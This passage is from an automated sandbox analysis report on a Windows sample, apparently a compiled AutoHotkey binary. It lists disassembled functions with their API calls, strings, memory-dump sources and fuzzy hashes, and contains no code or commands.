Function 0000000140038657 Relevance: 9.2, APIs: 6, Instructions: 165windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 50c6352bd5b426f2a6ca0c866d4913bc776fa15cc85afecb9beef65cd758b17e
Instruction ID: fd39e5ded891d05f87acee001207b8f30576287b4ca076eeb85275ff7f0cbcbe
Opcode Fuzzy Hash: 50c6352bd5b426f2a6ca0c866d4913bc776fa15cc85afecb9beef65cd758b17e
Instruction Fuzzy Hash: 43817032605B4086FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140033C13 Relevance: 9.2, APIs: 6, Instructions: 158windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 9c07826b29a573e97f4ed6c2c8655f311e24d0e5d74963b268fad9ded9675fbf
Instruction ID: 6c87ed7a79808b08dcf35e01071656c9443125858a6b5857407770199807a3d9
Opcode Fuzzy Hash: 9c07826b29a573e97f4ed6c2c8655f311e24d0e5d74963b268fad9ded9675fbf
Instruction Fuzzy Hash: 0A716132605B4086FB6B8B27E8947EA37A1F74DBE4F544116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001E640 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 150comCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A1510: malloc.LIBCMT ref: 00000001400A155C

InitializeCriticalSection.KERNEL32 ref: 000000014001E95F
OleInitializeWOW.OLE32 ref: 000000014001E967

Strings

No tray mem, xrefs: 000000014001E8A0
Tray, xrefs: 000000014001E882
Clipboard, xrefs: 000000014001E8EB, 000000014001E918

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Initialize$CriticalSectionmalloc
String ID: Clipboard$No tray mem$Tray
API String ID: 2052168798-1447848212
Opcode ID: 10de23e86fadf6c847ef25f1bf01291d823d392bc22fa8236b67eaa57190e6e2
Instruction ID: 925009f07ed6017cab7df2bf00feca6bed69065a01af03278a7589db18145faf
Opcode Fuzzy Hash: 10de23e86fadf6c847ef25f1bf01291d823d392bc22fa8236b67eaa57190e6e2
Instruction Fuzzy Hash: CC91D130104B4485FB1B8B57BD81BC9B7E8BB6CB94F58021ADB990BBB1DB79C165C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140003F2E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004B68
Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004B98
Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004BBD

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A

Part of subcall function 00000001400041A0: GetTickCount.KERNEL32 ref: 00000001400041B7

Strings

call, xrefs: 0000000140003F17

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$free$Message
String ID: call
API String ID: 1247145397-3431870270
Opcode ID: fca46172bf6ca2278eec6aaa60b1695537e1abb3f461214c94fc7f135be27a73
Instruction ID: 49c86c7b959db96a9c8bc3181f26ad41f8f6c6dfeadceea29a8de73cde9402dc
Opcode Fuzzy Hash: fca46172bf6ca2278eec6aaa60b1695537e1abb3f461214c94fc7f135be27a73
Instruction Fuzzy Hash: B3617E72604B808AF726CF66F8403ED77A1F78CB98F544126EB4A47AB9DB34C581CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140003EC9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004B68
Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004B98
Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004BBD

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A

Part of subcall function 00000001400041A0: GetTickCount.KERNEL32 ref: 00000001400041B7

Strings

call, xrefs: 0000000140003F17

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$free$Message
String ID: call
API String ID: 1247145397-3431870270
Opcode ID: 1a0d1250352621168d7a7ac3eb71bbd26c2c29c609b7ee303e5093b7f09285f7
Instruction ID: b62562f51cc92bbdefb8ab62754dc33ccd560dd2fbf1db1699b1f88b8013b1f5
Opcode Fuzzy Hash: 1a0d1250352621168d7a7ac3eb71bbd26c2c29c609b7ee303e5093b7f09285f7
Instruction Fuzzy Hash: 60616372104B808AF766CF26F8407E977A1F38CB98F544126EB8A47BB5DB34C581CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140003E82 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004B68
Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004B98
Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004BBD

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A

Part of subcall function 00000001400041A0: GetTickCount.KERNEL32 ref: 00000001400041B7

Strings

call, xrefs: 0000000140003EA8

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$free$Message
String ID: call
API String ID: 1247145397-3431870270
Opcode ID: 85139e07a413c257b78a03f2f182c30657dad2e1a47e31428406810441b3b56c
Instruction ID: 712e2a35f15f2a0e6bdc36c4cd5952dcac5668871b40faf330a5c43b24daa7ee
Opcode Fuzzy Hash: 85139e07a413c257b78a03f2f182c30657dad2e1a47e31428406810441b3b56c
Instruction Fuzzy Hash: 05616172204B809AF766CF26F8447E937A1F38CB98F544126EB8A47AB5DB35C581CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B3F88 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

wcsncpy.LIBCMT ref: 00000001400B3FB2
wcsncpy.LIBCMT ref: 00000001400B3FCF
PostMessageW.USER32 ref: 00000001400B4049
MessageBoxW.USER32 ref: 00000001400B406D

Strings

AutoHotkey v1.1.37.01, xrefs: 00000001400B3F9D

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Messagewcsncpy$Post
String ID: AutoHotkey v1.1.37.01
API String ID: 36970114-194712299
Opcode ID: 84b615c64389e203d2d201617b87cb392f15ef37e8127bd5d923b6c913bdcd5d
Instruction ID: 5688fba3567768b6dcbace76990945fea99225c1f65dfc4665573bddbe8d01b5
Opcode Fuzzy Hash: 84b615c64389e203d2d201617b87cb392f15ef37e8127bd5d923b6c913bdcd5d
Instruction Fuzzy Hash: 7331C872614AC485E7339F26E4407DD73A0FB6DBC4F098225EB8417AB4DB38C185CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140002BE5 Relevance: 7.7, APIs: 5, Instructions: 212windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
DragFinish.SHELL32 ref: 00000001400030D3

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$DragFinishMessage
String ID:
API String ID: 1078106488-0
Opcode ID: 55325afd3fdf9f8fe719bae6391a7b1363c530a7b8b6d11aa44296cce7b320f5
Instruction ID: 97b0d1c69dd79f3c75ef6655f5bbadf9128436a32aa2beb7238ed56fbc316f89
Opcode Fuzzy Hash: 55325afd3fdf9f8fe719bae6391a7b1363c530a7b8b6d11aa44296cce7b320f5
Instruction Fuzzy Hash: 03B16CB2205A808AFB67CF27A8547ED77A5F78DBD8F144116EB5A47AB5CB34C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140002D78 Relevance: 7.7, APIs: 5, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
DragFinish.SHELL32 ref: 00000001400030D3

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$DragFinishMessage
String ID:
API String ID: 1078106488-0
Opcode ID: 6f3a57de0b8694bc2c6a0ba5a60554a18b0220b10c4f7fe02d0a8cecdbf94fa4
Instruction ID: f9baf5945d45696ac31674e60e141ca7a6a12bd6c1fbb670ea1c80e55695b0d5
Opcode Fuzzy Hash: 6f3a57de0b8694bc2c6a0ba5a60554a18b0220b10c4f7fe02d0a8cecdbf94fa4
Instruction Fuzzy Hash: 4FA15DB2605A808AEB67CF27A9503E977A1F38DBD8F144116EB9617AF5CB34C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140002D0A Relevance: 7.7, APIs: 5, Instructions: 180COMMON

Download Yara Rule

APIs

DragFinish.SHELL32 ref: 00000001400030D3

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: DragFinish
String ID:
API String ID: 1853471036-0
Opcode ID: 942ba5d639d23460ad9085152eaf73a7886cc4f7a9ca18a364282befeccaab16
Instruction ID: 3c476a18d10ba3b814ec87d4f28c894b0dfb19c2eb6b658983351ad65640819b
Opcode Fuzzy Hash: 942ba5d639d23460ad9085152eaf73a7886cc4f7a9ca18a364282befeccaab16
Instruction Fuzzy Hash: 56916D72205A808AFB67CF27B8503E977A0F78DBD4F154226EB5A47AB5DB34C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140002CCD Relevance: 7.7, APIs: 5, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
DragFinish.SHELL32 ref: 00000001400030D3
GetTickCount.KERNEL32 ref: 00000001400031A1
wcsncpy.LIBCMT ref: 000000014000321F
GetTickCount.KERNEL32 ref: 0000000140003247

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$DragFinishMessagewcsncpy
String ID:
API String ID: 1341528516-0
Opcode ID: f6dc6227e1352179419a2fc68deb7848634684301bc41a2a2d4528834fdecf1a
Instruction ID: d1d7c1faaf6baa5902af4a5dbec2ce6e0e54dbd4741f2d7ec8b86ac4178e3ddf
Opcode Fuzzy Hash: f6dc6227e1352179419a2fc68deb7848634684301bc41a2a2d4528834fdecf1a
Instruction Fuzzy Hash: C0815D72605A818AFB67CF27B8503E977A4F38DB98F144216EB5A476F5CB34C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140056A71 Relevance: 7.5, APIs: 5, Instructions: 44timeclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140056A8A
CloseClipboard.USER32 ref: 0000000140056A97
GetCurrentProcessId.KERNEL32 ref: 0000000140056AAB
EnumWindows.USER32 ref: 0000000140056AC6
SetTimer.USER32 ref: 0000000140056B0C

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: ClipboardCloseCurrentEnumGlobalProcessTimerUnlockWindows
String ID:
API String ID: 555064778-0
Opcode ID: 122f0086822fe55000f8ee644d42007e11c9274c692e3ca629be843e9de11bc1
Instruction ID: ab13099335ea4c18d4202fbfe90588f7f8542d52cd688e17405bc56db2a0250f
Opcode Fuzzy Hash: 122f0086822fe55000f8ee644d42007e11c9274c692e3ca629be843e9de11bc1
Instruction Fuzzy Hash: D3210436205A8685EB56DF63A8807E973A4F74CBE1F584426EB4967634DE78C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140003DB0 Relevance: 6.1, APIs: 4, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004B68
Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004B98
Part of subcall function 0000000140004B20: free.LIBCMT ref: 0000000140004BBD

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A

Part of subcall function 00000001400041A0: GetTickCount.KERNEL32 ref: 00000001400041B7

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$free$Message
String ID:
API String ID: 1247145397-0
Opcode ID: 31caa77e5fc26299c92a5d1d7da4bef28b2147d2384a5cb6415aa9bba25e299f
Instruction ID: 93ff463c755829dd5f46b0f84b3be2c0b08701a00e744aebaf331863275f3ab7
Opcode Fuzzy Hash: 31caa77e5fc26299c92a5d1d7da4bef28b2147d2384a5cb6415aa9bba25e299f
Instruction Fuzzy Hash: AE518372205B809AF766CF26F8407E937A1F78CB98F144126EB9A47AB5DB34C581CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001C03 Relevance: 6.1, APIs: 4, Instructions: 99windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
GetFocus.USER32 ref: 0000000140002140

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$FocusMessage
String ID:
API String ID: 3376117608-0
Opcode ID: 4ed854001584b0010d3e3320374878ea06acf23f7a43639987cc36095f5ae0a5
Instruction ID: 96400dc4a226dfce3f9499920e439daa3eda86c85f85cc2c0892fc1073da92ee
Opcode Fuzzy Hash: 4ed854001584b0010d3e3320374878ea06acf23f7a43639987cc36095f5ae0a5
Instruction Fuzzy Hash: CD517476104B809AFB56CF26F8447E937B1F38CB98F144126EB4A47AB5DB34C881CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001C1B Relevance: 6.1, APIs: 4, Instructions: 98windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
GetFocus.USER32 ref: 0000000140002140

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
